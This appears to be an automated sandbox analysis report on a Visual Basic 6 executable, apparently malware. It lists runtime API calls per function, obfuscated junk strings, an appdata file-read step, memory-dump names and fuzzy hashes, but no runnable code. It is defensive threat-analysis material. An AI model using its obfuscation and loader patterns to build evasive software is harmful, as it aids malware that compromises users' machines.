__vbaLenBstr.MSVBVM60(00000000,00000010,0000000A,0000000A,?), ref: 0041CA91
#574.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAAD
__vbaStrMove.MSVBVM60(00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CABA
#696.MSVBVM60(00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAC0
__vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,00000003,00000000,00000010,0000000A,0000000A,?), ref: 0041CAE2
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041CAFA
#648.MSVBVM60(0000000A), ref: 0041CB4A
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041CB62
#696.MSVBVM60(OFFENTLIGHEDSSFRE,0000000A), ref: 0041CB99
#696.MSVBVM60(Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CBDD
__vbaNew2.MSVBVM60(0040259C,004223C0,Dagvagten,OFFENTLIGHEDSSFRE,0000000A), ref: 0041CC02
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0041CC67
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041CCC3
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,00000070), ref: 0041CCE8
#519.MSVBVM60(tilskrersaksene,?), ref: 0041CCF2
__vbaStrMove.MSVBVM60(tilskrersaksene,?), ref: 0041CCFF
#519.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD05
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD12
__vbaStrMove.MSVBVM60(00000000,tilskrersaksene,?), ref: 0041CD36
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041CD76
#648.MSVBVM60(0000000A), ref: 0041CD99
__vbaStrCopy.MSVBVM60 ref: 0041CDB9
__vbaFreeStr.MSVBVM60 ref: 0041CE1D
__vbaFreeVar.MSVBVM60 ref: 0041CE28
#527.MSVBVM60(Forretningsbrevet5), ref: 0041CE3C
__vbaStrMove.MSVBVM60(Forretningsbrevet5), ref: 0041CE49
__vbaFreeStr.MSVBVM60 ref: 0041CE6A
__vbaStrCopy.MSVBVM60 ref: 0041CE7A
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEC2
__vbaStrMove.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEF2
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CEFD
#535.MSVBVM60(00000000,00401260,00402340,000006F8), ref: 0041CF02
#564.MSVBVM60(00000004,?), ref: 0041CF31
__vbaHresultCheck.MSVBVM60(00000000,00000004,?), ref: 0041CF4B
#685.MSVBVM60(00000004,?), ref: 0041CF5F
__vbaObjSet.MSVBVM60(?,00000000,00000004,?), ref: 0041CF6C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040264C,0000001C), ref: 0041CFB3
__vbaI4Var.MSVBVM60(?), ref: 0041CFE2
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,000006FC), ref: 0041D04E
__vbaFreeObj.MSVBVM60(00000000,00401260,00402340,000006FC), ref: 0041D068
__vbaFreeVarList.MSVBVM60(00000002,00000004,?), ref: 0041D07D
#537.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D08A
__vbaStrMove.MSVBVM60(0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D097
#696.MSVBVM60(00000000,0000009B,?,?,?,?,?,?,?,?,?,?,?,?,?,00401546), ref: 0041D09D
#648.MSVBVM60(0000000A), ref: 0041D0C4
__vbaR8FixI4.MSVBVM60(0000000A), ref: 0041D0D6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D14C
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D166
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000700), ref: 0041D171
#648.MSVBVM60(0000000A), ref: 0041D191
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000704), ref: 0041D1E7
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000704), ref: 0041D201
#648.MSVBVM60(0000000A), ref: 0041D221
#714.MSVBVM60(?,00000004,00000000,0000000A), ref: 0041D253
#648.MSVBVM60(0000000A,?,00000004,00000000,0000000A), ref: 0041D273
#564.MSVBVM60(00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2A3
__vbaHresultCheck.MSVBVM60(00000000,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2BD
__vbaI4Var.MSVBVM60(?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D2F0
__vbaI4Var.MSVBVM60(?,?,?,00000004,?,0000000A,?,00000004,00000000,0000000A), ref: 0041D309
__vbaFreeVarList.MSVBVM60(00000006,0000000A,00000004,0000000A,00000004,?,?), ref: 0041D37A
#581.MSVBVM60(eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D387
#713.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D397
__vbaStrMove.MSVBVM60(RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D3A4
__vbaFpI4.MSVBVM60 ref: 0041D3C2
__vbaStrCopy.MSVBVM60 ref: 0041D3D8
__vbaStrMove.MSVBVM60(Benefact6,?), ref: 0041D3F5
__vbaStrMove.MSVBVM60 ref: 0041D436
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041D452
#696.MSVBVM60(ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000,0000009B), ref: 0041D45F
#574.MSVBVM60(00000003), ref: 0041D486
__vbaStrMove.MSVBVM60(00000003), ref: 0041D493
__vbaR8IntI4.MSVBVM60(00000003), ref: 0041D49E
__vbaLenBstrB.MSVBVM60(Whiskysourens1,?,?,?), ref: 0041D4DB
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D518
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D532
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000708), ref: 0041D53D
#696.MSVBVM60(Kainsmrkernes3), ref: 0041D547
__vbaStrCopy.MSVBVM60 ref: 0041D5C6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,0000070C), ref: 0041D624
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,0000070C), ref: 0041D63E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000710), ref: 0041D69F
__vbaVarDup.MSVBVM60(00000000,00401260,00402340,00000710), ref: 0041D6D3
#607.MSVBVM60(?,00000065,00000003), ref: 0041D6E8
__vbaStrVarMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D6F4
__vbaStrMove.MSVBVM60(?,?,00000065,00000003), ref: 0041D701
__vbaStrCopy.MSVBVM60(?,?,00000065,00000003), ref: 0041D711
__vbaLenBstrB.MSVBVM60(Udstillingslokalet,?,?,000FFFC6,005EA767,?,?,00000065,00000003), ref: 0041D747
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041D787
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,ADMIRINGLY,?,?,RODTEGNENES,eudaemonistical,?,?,?,?,?,00000000), ref: 0041D79F
#705.MSVBVM60(00000002,00000000), ref: 0041D7C4
__vbaStrMove.MSVBVM60(00000002,00000000), ref: 0041D7D1
__vbaLenBstrB.MSVBVM60(00000000,00000002,00000000), ref: 0041D7D7
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D812
__vbaFreeStr.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D82C
__vbaFreeVar.MSVBVM60(00000000,00401260,00402340,00000714), ref: 0041D837
__vbaLenBstr.MSVBVM60(Generalisations7), ref: 0041D841
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000718), ref: 0041D894
#525.MSVBVM60(00000067), ref: 0041D8B3
__vbaStrMove.MSVBVM60(00000067), ref: 0041D8C0
#618.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8CC
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8D9
__vbaStrMove.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D8FD
__vbaStrCopy.MSVBVM60(STRUTTENDE,00000017,00000067), ref: 0041D920
__vbaStrMove.MSVBVM60(?,SOLITRSKAKKEN,Indvi2,Fdres,?,STRUTTENDE,00000017,00000067), ref: 0041D94E
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,0000071C), ref: 0041D98B
__vbaStrMove.MSVBVM60(00000000,00401260,00402340,0000071C), ref: 0041D9BB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0041D9E5
#564.MSVBVM60(00000005,?), ref: 0041DA1D
__vbaHresultCheck.MSVBVM60(00000000), ref: 0041DA37
#541.MSVBVM60(?,16:16:16), ref: 0041DA57
__vbaStrVarVal.MSVBVM60(?,?,?,16:16:16), ref: 0041DA6A
#519.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DA70
__vbaStrMove.MSVBVM60(00000000,?,?,?,16:16:16), ref: 0041DA7D
#648.MSVBVM60(0000000A,00000000,?,?,?,16:16:16), ref: 0041DA9D
__vbaStrMove.MSVBVM60(?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DAE9
__vbaI4Var.MSVBVM60(?,00000000,?,003D78C1,?,0000000A,00000000,?,?,?,16:16:16), ref: 0041DAF6
__vbaHresultCheckObj.MSVBVM60(00000000,00401260,00402340,00000720), ref: 0041DB2C
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 0041DB62
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0041DB88
#696.MSVBVM60(00402900), ref: 0041DB95
#696.MSVBVM60(00402948,00402900), ref: 0041DBA6
__vbaStrCopy.MSVBVM60(00402948,00402900), ref: 0041DBBD
__vbaFreeStr.MSVBVM60 ref: 0041DC03
__vbaVarMove.MSVBVM60 ref: 0041DC2A
__vbaVarMove.MSVBVM60 ref: 0041DC4C
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 0041DC60
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 0041DC66
__vbaFreeVar.MSVBVM60(0041DD58), ref: 0041DD00
__vbaFreeStr.MSVBVM60(0041DD58), ref: 0041DD08
__vbaAryDestruct.MSVBVM60(00000000,?,0041DD58), ref: 0041DD1F
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD27
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD2F
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD37
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD3F
__vbaFreeVar.MSVBVM60(00000000,?,0041DD58), ref: 0041DD47
__vbaFreeStr.MSVBVM60(00000000,?,0041DD58), ref: 0041DD52

Strings

STRUTTENDE, xrefs: 0041D8C7
Utrecht8, xrefs: 0041D66A
tilskrersaksene, xrefs: 0041CCED
RODTEGNENES, xrefs: 0041D392
Skovteknikeren6, xrefs: 0041DBB2
7:7:7, xrefs: 0041C7D6
Snoreskrternes8, xrefs: 0041D31B
tril, xrefs: 0041D30F
Dagvagten, xrefs: 0041CBD8
Udstillingslokalet, xrefs: 0041D742
SOLITRSKAKKEN, xrefs: 0041D936
SELVFINANSIEREDES, xrefs: 0041DBE4
CANNIBALEAN, xrefs: 0041C854
eudaemonistical, xrefs: 0041D382
undrede, xrefs: 0041D5EA
16:16:16, xrefs: 0041DA4B
Whiskysourens1, xrefs: 0041D4D6
Readjust, xrefs: 0041C808
Hjortens, xrefs: 0041C721
Admiraliteternes1, xrefs: 0041CDAE
=9, xrefs: 0041D5A9
Lersernes, xrefs: 0041D1AB
Forretningsbrevet5, xrefs: 0041CE37
centralregeringens, xrefs: 0041D5BB
Indvi2, xrefs: 0041D931
Fdres, xrefs: 0041D92C
multivalent, xrefs: 0041C85E
Kainsmrkernes3, xrefs: 0041D542
ASCRY, xrefs: 0041D706
Bursati, xrefs: 0041C859
replicr, xrefs: 0041C96F
OFFENTLIGHEDSSFRE, xrefs: 0041CB94
ADMIRINGLY, xrefs: 0041D45A
Odontoma7, xrefs: 0041D5EF
Generalisations7, xrefs: 0041D83C
blaarv, xrefs: 0041D110
Benefact6, xrefs: 0041D3E4
DUMBFISH, xrefs: 0041D915
Paucify9, xrefs: 0041D3CD
Vidnefast, xrefs: 0041CE6F

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$List$#648#696$Copy$Bstr$#519#564$#541#574#705#713$#522#524#525#527#535#537#558#560#581#606#607#610#618#661#670#685#690#714ChkstkConstruct2DestructIdivNew2
String ID: 16:16:16$7:7:7$=9$ADMIRINGLY$ASCRY$Admiraliteternes1$Benefact6$Bursati$CANNIBALEAN$DUMBFISH$Dagvagten$Fdres$Forretningsbrevet5$Generalisations7$Hjortens$Indvi2$Kainsmrkernes3$Lersernes$OFFENTLIGHEDSSFRE$Odontoma7$Paucify9$RODTEGNENES$Readjust$SELVFINANSIEREDES$SOLITRSKAKKEN$STRUTTENDE$Skovteknikeren6$Snoreskrternes8$Udstillingslokalet$Utrecht8$Vidnefast$Whiskysourens1$blaarv$centralregeringens$eudaemonistical$multivalent$replicr$tilskrersaksene$tril$undrede
API String ID: 1918163132-2023598156
Opcode ID: 9d686f8c3daf2795f549159a0ecb804572eb615873d9349ef6c38574d8506ea0
Instruction ID: 4f597cf3ee989f2d3e6e7cc483b1ea7435433e21d18263570a5c1f8dfc7ea310
Opcode Fuzzy Hash: 9d686f8c3daf2795f549159a0ecb804572eb615873d9349ef6c38574d8506ea0
Instruction Fuzzy Hash: E5D20875940228ABDB21EF61CD85FDDB7B8AF08304F1080EAE509BB1A1DB785B85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0041FFB0, Relevance: 124.7, APIs: 62, Strings: 9, Instructions: 416COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041FFCE
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041FFF8
__vbaAryConstruct2.MSVBVM60(?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420008
#593.MSVBVM60(0000000A), ref: 00420026
__vbaFreeVar.MSVBVM60(0000000A), ref: 00420031
#537.MSVBVM60(000000D4,0000000A), ref: 0042003B
__vbaStrMove.MSVBVM60(000000D4,0000000A), ref: 00420045
#648.MSVBVM60(0000000A), ref: 0042005C
#652.MSVBVM60(?,00000002,?,?,?,0000000A), ref: 00420080
#692.MSVBVM60(?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 00420093
#522.MSVBVM60(?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200A0
__vbaStrVarVal.MSVBVM60(?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200B2
#514.MSVBVM60(00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002,?,?,?,0000000A), ref: 004200B8
__vbaVarTstNe.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004200D8
__vbaFreeStr.MSVBVM60(00008008,?,00000000,?,?,00000052,?,?,?,Jiggerens,Rappees,?,00000002), ref: 004200E7
__vbaFreeVarList.MSVBVM60(00000006,?,0000000A,00000002,?,?,00008008,00008008,?,00000000,?,?,00000052,?,?,?), ref: 0042010F
__vbaVarDup.MSVBVM60 ref: 00420143
#513.MSVBVM60(?,?,000000A2), ref: 00420155
__vbaStrVarVal.MSVBVM60(?,?,00000075,00000002,?,?,000000A2), ref: 00420176
#628.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042017C
__vbaStrMove.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 00420186
__vbaFreeStr.MSVBVM60(00000000,?,?,00000075,00000002,?,?,000000A2), ref: 0042018E
__vbaFreeVarList.MSVBVM60(00000003,?,?,00000002,00000000,?,?,00000075,00000002,?,?,000000A2), ref: 004201A1
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004201BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 0042021E
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,000000C0), ref: 0042027D
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,000000C0), ref: 0042029F
#628.MSVBVM60(UNINTERMITTEDLY,00000008,00000002), ref: 004202BD
#670.MSVBVM60(?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202D0
__vbaVarTstNe.MSVBVM60(?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202DD
__vbaFreeVarList.MSVBVM60(00000003,00000002,00008008,?,?,00008008,?,?,?,?,?,?,UNINTERMITTEDLY,00000008,00000002), ref: 004202F7
#525.MSVBVM60(000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420313
__vbaStrMove.MSVBVM60(000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 0042031D
#696.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420323
__vbaFreeStr.MSVBVM60(00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420331
#696.MSVBVM60(MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 0042033B
#541.MSVBVM60(?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 00420350
__vbaStrVarVal.MSVBVM60(?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 0042035D
#696.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 00420363
__vbaFreeStr.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 00420377
__vbaFreeVar.MSVBVM60(00000000,?,?,?,2:2:2,MINESTRYGNING,00000000,000000B1,?,?,?,?,00402FF4,00000002), ref: 0042037F
#702.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203DA
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203E4
#696.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203EA
__vbaFreeStr.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004203FF
__vbaFreeVar.MSVBVM60(00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420407
#696.MSVBVM60(Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042045C
#648.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042049E
__vbaFreeVar.MSVBVM60(0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204B3
#648.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204E8
__vbaFreeVar.MSVBVM60(0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 004204FD
#651.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420528
__vbaStrMove.MSVBVM60(00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420532
__vbaStrCat.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420538
__vbaStrMove.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420542
__vbaFreeStr.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0042054A
__vbaFreeVar.MSVBVM60(00000000,00000002,BESMUDSES,0000000A,0000000A,Suppositoriets,00000000,00000003,000000FF,000000FE,000000FE,000000FE), ref: 00420552
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205A5
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205AD
__vbaFreeStr.MSVBVM60(004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205B5
__vbaAryDestruct.MSVBVM60(00000000,?,004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205CC
__vbaFreeStr.MSVBVM60(00000000,?,004205DA,?,?,?,?,00402FF4,00000002,?,?,?,?,00401546), ref: 004205D4

Strings

BESMUDSES, xrefs: 0042051F
PREHISTORICS, xrefs: 00420126
:, xrefs: 004202A4
2:2:2, xrefs: 00420347
MINESTRYGNING, xrefs: 00420336
UNINTERMITTEDLY, xrefs: 004202B8
Rappees, xrefs: 00420085
Jiggerens, xrefs: 0042008A
Suppositoriets, xrefs: 00420457

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#696$#648List$#628CheckHresult$#513#514#522#525#537#541#593#651#652#670#692#702ChkstkConstruct2CopyDestructNew2
String ID: 2:2:2$:$BESMUDSES$Jiggerens$MINESTRYGNING$PREHISTORICS$Rappees$Suppositoriets$UNINTERMITTEDLY
API String ID: 2160480785-2797486545
Opcode ID: 99d5d1945da234d3eb21bbea69b2c24f2def652990e0d9fe3f0f05b968b7193f
Instruction ID: 247844ea3c9e4145d6387bb99d9b60c49b8363080f8287a008bbd778335b1946
Opcode Fuzzy Hash: 99d5d1945da234d3eb21bbea69b2c24f2def652990e0d9fe3f0f05b968b7193f
Instruction Fuzzy Hash: 36027E71900218ABDB15EBA0DC96FEDB7B8BF04304F10816FE105BB1E2EB789A45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD7C, Relevance: 71.9, APIs: 33, Strings: 8, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041DD99
#692.MSVBVM60(?,baadene,Scopiformly9,?,?,?,?,00401546), ref: 0041DDB9
__vbaVarTstNe.MSVBVM60(00008008,?), ref: 0041DDD4
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041DDE3
#618.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DDFE
__vbaStrMove.MSVBVM60(Reklamekampagne4,0000001B,00008008,?), ref: 0041DE08
__vbaNew2.MSVBVM60(0040259C,004223C0,Reklamekampagne4,0000001B,00008008,?), ref: 0041DE20
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DE82
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,00000118,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4), ref: 0041DEE1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,Reklamekampagne4,0000001B,00008008), ref: 0041DF03
__vbaStrCopy.MSVBVM60(00008008,?), ref: 0041DF10
#618.MSVBVM60(?,00000044,00008008,?), ref: 0041DF1A
__vbaStrMove.MSVBVM60(?,00000044,00008008,?), ref: 0041DF24
__vbaStrCmp.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF2F
__vbaFreeStr.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF46
__vbaVarDup.MSVBVM60(Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF6E
#666.MSVBVM60(?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF7B
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DF9A
__vbaStrVarMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFA0
__vbaStrMove.MSVBVM60(00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFAA
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFB9
__vbaFreeStr.MSVBVM60(00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041DFC1
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,00000120,000000FF,00000001,00000000,00000000,?,00000008,?,?,?,Jordfstedes4,00000000), ref: 0041DFD4
__vbaGet3.MSVBVM60(00000000,?,00000001), ref: 0041DFE4
__vbaFileClose.MSVBVM60(00000001,00000000,?,00000001), ref: 0041DFEB
#526.MSVBVM60(?,000000EC,00000001,00000000,?,00000001), ref: 0041DFF9
__vbaStrVarMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E002
__vbaStrMove.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E00C
__vbaFreeVar.MSVBVM60(?,?,000000EC,00000001,00000000,?,00000001), ref: 0041E014
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E04A
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E052
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E05A
__vbaFreeStr.MSVBVM60(0041E068,Jordfstedes4,00000000,?,00000044,00008008,?), ref: 0041E062

Strings

Reklamekampagne4, xrefs: 0041DDF9
Ambulancesagen2, xrefs: 0041DDBE
Jordfstedes4, xrefs: 0041DF2A
baadene, xrefs: 0041DDB0
Scopiformly9, xrefs: 0041DDAB
CONTINUATOR, xrefs: 0041DF08
\XvFu5flZcgudIlwvVLtjOx372, xrefs: 0041DF80
appdata, xrefs: 0041DF5A

Memory Dump Source

Source File: 00000005.00000002.738949371.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.738931760.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.739096648.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.739120372.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#618CheckFileHresult$#526#666#692ChkstkCloseCopyGet3ListNew2Open
String ID: Ambulancesagen2$CONTINUATOR$Jordfstedes4$Reklamekampagne4$Scopiformly9$\XvFu5flZcgudIlwvVLtjOx372$appdata$baadene
API String ID: 3805544571-2284846736
Opcode ID: 4722b21ee1cf255405dc4c68612446d92cf5e35516269fcb109170723b20a3ff
Instruction ID: ab1f30ff9109013bb15fdbf0051d3cce643812e99e5e35539fe9f4867291def5
Opcode Fuzzy Hash: 4722b21ee1cf255405dc4c68612446d92cf5e35516269fcb109170723b20a3ff
Instruction Fuzzy Hash: 3D712971E00218AADB10EBA1CD46FDEB7B8AF04704F50817AF109B71E2DB785A45CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00420764, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 307COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00420782
#575.MSVBVM60(?,00000003), ref: 004207D1
#518.MSVBVM60(?,?,?,00000003), ref: 004207DE
__vbaVarTstLt.MSVBVM60(00008008,?), ref: 00420802
__vbaFreeVarList.MSVBVM60(00000003,00000003,?,?,00008008,?), ref: 0042081C
__vbaNew2.MSVBVM60(0040259C,004223C0,?,?,?,00401546), ref: 0042084D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040258C,00000014), ref: 004208AF
__vbaChkstk.MSVBVM60(00000000,?,0040258C,00000014), ref: 004208E0
__vbaStrI4.MSVBVM60(005E4C2E), ref: 004208F6
__vbaStrMove.MSVBVM60(005E4C2E), ref: 00420900
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420941
__vbaFreeStr.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420958
__vbaFreeObj.MSVBVM60(00000000,?,004025AC,0000013C), ref: 00420960
#573.MSVBVM60(?,00000002), ref: 00420982
